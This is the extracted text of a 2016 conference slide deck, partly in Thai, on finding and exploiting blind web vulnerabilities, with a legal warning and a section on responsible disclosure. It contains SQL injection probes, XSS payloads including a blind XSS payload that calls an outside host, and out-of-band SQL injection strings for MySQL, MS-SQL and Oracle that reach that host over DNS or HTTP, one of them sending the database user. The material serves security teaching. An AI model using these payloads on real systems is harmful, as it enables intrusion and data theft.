Presented by Pichaya Morimoto Event: Man in the Information Systems Security 2016 a.k.a. MiSSConf(SP1) Date: June 18, 2016

1. Exploiting Blind Vulnerabilities
A tale of webapp security wizard
Pichaya Morimoto
IT Security Consultant, SEC Consult (Thailand) Co.,Ltd.
GIAC Web Application Penetration Tester Certified

2. Pichaya Morimoto
IT Security Consultant
SEC Consult (Thailand) Co., Ltd.
whoami
สอนแฮกเว็บแบบแมวๆ
https://www.facebook.com/longhackz
https://www.youtube.com/user/pich4ya

3. Hacking Competition (Pwnladin Team)

4. Security Advisories

5. Security Advisories
https://www.limesurvey.org/blog/76-limesurvey-news/security-
advisories/1836-limesurvey-security-advisory-10-2015

6. Public Exploits

7. SEC Consult - Who we are

8. ★ Advisor for information security
★ Expert for the implementation of security processes and policies
(ISO 27001, BS 25999, GSHB)
★ Leading company for technical security audits
★ Specialist for web application security according to ONR 17700
★ Independent of product manufacturers
★ Our customers are public authorities, financial institutions and
insurance companies in Central Europe
★ Sectoral orientation (defence, public, finance, industry)
SEC Consult - Who we are

9. entire company within
certification scope
certified since 16.01.2008
ISO/IEC 27001 Certificate

10. SEC Consult Vulnerability Lab
European leading research lab for the
identification of vulnerabilities and
the analysis of new technologies,
products and applications (security
advisories)
Integral part of the education and the
further training of the security experts
at SEC Consult
Early information of our customers
due to SEC Consult security alerts
Support of well-known manufacturers
to enhance the security of their
products
Companies and organisations SEC Consult has released security advisories for (excerpt).
For details see: http://www.sec-consult.com/72.html

11. Contact SEC Consult

12. ★ Vulnerabilities and Exploits
★ Blind Vulnerabilities
★ Exploitation Techniques
★ Setup Environment
★ Demo
Overview

13. Network
Application Level
OS
Application
Web App
www.facebook.com
System: Facebook (Simplified version)

14. Attack Surface
Web as an Attack Surface:
- User Input
- HTTP Header
- HTTP Body
- Control Flow
- Abuse path of
web execution

15. Vulnerabilities
OWASP Top 10 for 2013:
★ A1 Injection
★ A2 Broken Authentication and Session Management
★ A3 Cross-Site Scripting (XSS)
★ A4 Insecure Direct Object References
★ A5 Security Misconfiguration
★ A6 Sensitive Data Exposure
★ A7 Missing Function Level Access Control
★ A8 Cross-Site Request Forgery (CSRF)
★ A9 Using Components with Known Vulnerabilities
★ A10 Unvalidated Redirects and Forwards
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

16. SQL Injection

17. SQL Injection

18. SQL Injection
SELECT text, description FROM news WHERE
description LIKE '%let's go%'
SELECT text, description FROM news WHERE
description LIKE '%let's go%'

19. SQL Injection: UNION

20. Non-blind Vulnerability
YOU ARE NOT BLIND !
สามารถนําขอมูลออกมาไดโดยตรงบนหนาเว็บ

21. sqlite_master.sql

22. SQL Injection: UNION

23. SQL Injection: UNION
PWNED

24. แลวถา...
ขอมูลที่ SELECT
ออกมาไมไดถูกนําไปแสดง
หรือเปน SQL query แบบ..
- UPDATE
- INSERT
- DELETE
- อื่น ๆ ที่ไมไดแสดงผลลัพธ

25. Introduction to BLIND Vulnerabilities

26. Case Study: TreeOfSavior.com

27. การแฮกเจาะระบบเขาไปในระบบ
ใด ๆ ที่เจาของระบบไมอนุญาติ
ใหเราทดสอบระบบ
เปนสิ่งผิดกฏหมาย
ทําแลวอาจติดคุกหรือโดนปรับ
เปนคดีอาญายอมความไมได
Legal Warning: คําเตือน

28. April 26, 2016: ตอนเชา

29. April 26, 2016 : ตอนเที่ยงวัน...

30. April 26, 2016 : ตอนเที่ยงคืน...

31. April 27, 2016 : ตี 1

32. BLIND SQL Injection: Probe
aaaaa' or (1=1) or 'bbbbbb

33. BLIND SQL Injection: Probe
aaaaa' or (1=2) or 'bbbbbb

34. BLIND SQL Injection: Probe
aaaaa' order by contentz-- -

35. BLIND SQL Injection: Probe
aaaaa' order by content-- -

36. BLIND SQL Injection: Exploit
★ information_schema
★ mysql
★ performance_schema
★ sys
★ test
★ tos_wiki
★ treeofsavior
SQLMap
EZ EZ Script Kiddy!

37. Responsible Disclosure 101

38. Responsible Disclosure 101

39. ชองโหวอะไรอีกที่โจมตีแบบ Blind ได?

40. Cross-Site Scripting (XSS)
โชวคาที่รับมาจา
ก user input
บนหนา HTML

41. Cross-Site Scripting (XSS)
http://127.0.0.1:1234/hello.php?name=<script>alert("let do
something evil")</script>

42. ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ
Blind XSS?

43. ไมเห็นโดยตรง ก็ตองหาทางเห็นแบบออม ๆ ไปแทน..
How to Find Generic Blind Vulns
Exploit Payload
ที่มีการทํา outbound
connection
เครื่องที่ถูกโจมตี รันโคดจาก
exploit เพื่อทําอะไร
บางอยางใหคนโจมตีรูวาการโ
จมตีนั้นไดผล
ผูโจมตีไดรับขอมูลบางอยาง
เพื่อพิสูจนไดวา ชองโหวที่
exploit ไปสําเร็จ
1
2
3

44. ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ HTTP Request !
Blind XSS
"><script>new Image().
src="http://p7z.pw/xss1/?
a=1337"</script>

45. ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ HTTP Request !
Blind XSS
IP คนโดน XSS IP เซิรฟเวอรรอรับผล
$ tail -n 1 /var/log/apache2/access.log
[IP คนโดน XSS] - - [17/Jun/2016:18:38:30 -0400] "GET /xss1/?
a=1337 HTTP/1.1" 404 492 "-" "Mozilla/5.0 (Macintosh; Intel Mac
OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"

46. ไมเห็นโดยตรง ก็ตองหาทางเห็นแบบออม ๆ ไปแทน..
How to Find Generic Blind Vulns
Exploit Payload
ที่มีการทํา outbound
connection
เครื่องที่ถูกโจมตี รันโคดจาก
exploit เพื่อทําอะไร
บางอยางใหคนโจมตีรูวาการโ
จมตีนั้นไดผล
ผูโจมตีไดรับขอมูลบางอยาง
เพื่อพิสูจนไดวา ชองโหวที่
exploit ไปสําเร็จ
1
2
3

47. A.k.a. Out-of-band (OBB) technique
★ MySQL
LOAD_FILE('sqli1.p7z.pw')
INTO OUTFILE 'sqli2.p7z.pwtest.txt'
★ MS-SQL
OPENROWSET('SQLOLEDB', 'sqli3.p7z.pw';'a';'b', 'SELECT 1')
EXEC master..xp_dirtree 'sqli4.p7z.pw' --
★ Oracle
UTL_HTTP.request('sqli5.p7z.pw/?a='||(SELECT user FROM DUAL)
Probe for Blind SQL Injection
ที่มา: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

48. ★ ICMP Ping Request - 3 กะโหลก
★ HTTP Request - 4 กะโหลก
★ NBNS Request - 1 กะโหลก
★ FTP Login - 2 กะโหลก
★ DNS Resolution - 5 กะโหลก
Outbound Traffic

49. ★ ตองมี IP จริง เขาถึงไดจากอินเทอรเน็ต
★ ควรจะเปนเครื่อง Linux สะดวกกวา Windows
★ จด domain มาใชดวยจะดีมาก (ดูกันตอวาทําไม)
★ ควรเปนเครื่องใน network ที่ไมโดน block port
หรือมีการใช proxyใด ๆ ที่แกไขขอมูลเขา-ออก
Setup Server for Testing

50. Setup VPS

51. 1. Install apache2
2. Install bind9
Setup VPS

52. Setup Domain/DNS
ปแรก 200 บาท
domain + whois
privacy แลว
ชื่อ domain เอาสั้น
ๆ ที่สุดที่จะสั้นได

53. Setup Domain/DNS

54. Test DNS Resolution

55. Pros:
★ เซิรฟเวอรทั่วไปมีโปรแกรม ping หางาย
★ เร็วและงาย
Cons:
★ บางเซิรฟเวอร block ปง!
★ ชองโหวที่ไมใช Command Injection ใชไมได
#1 ICMP Ping Request

56. Pros:
★ ...
Cons:
★ บางเซิรฟเวอร block HTTP Outbound ไป untrusted IP !?
#2 HTTP Request

57. Pros:
★ ไมมีเซิรฟเวอรที่ไหน block DNS
Cons:
★ Setup ยุงยากเล็กนอยตอนเริ่ม
#3 DNS Resolution

58. DEMO
Find Blind Vuln with DNS Resolution

59. Thank you!
FB: สอนแฮกเว็บแบบแมว ๆ
https://fb.com/longhackz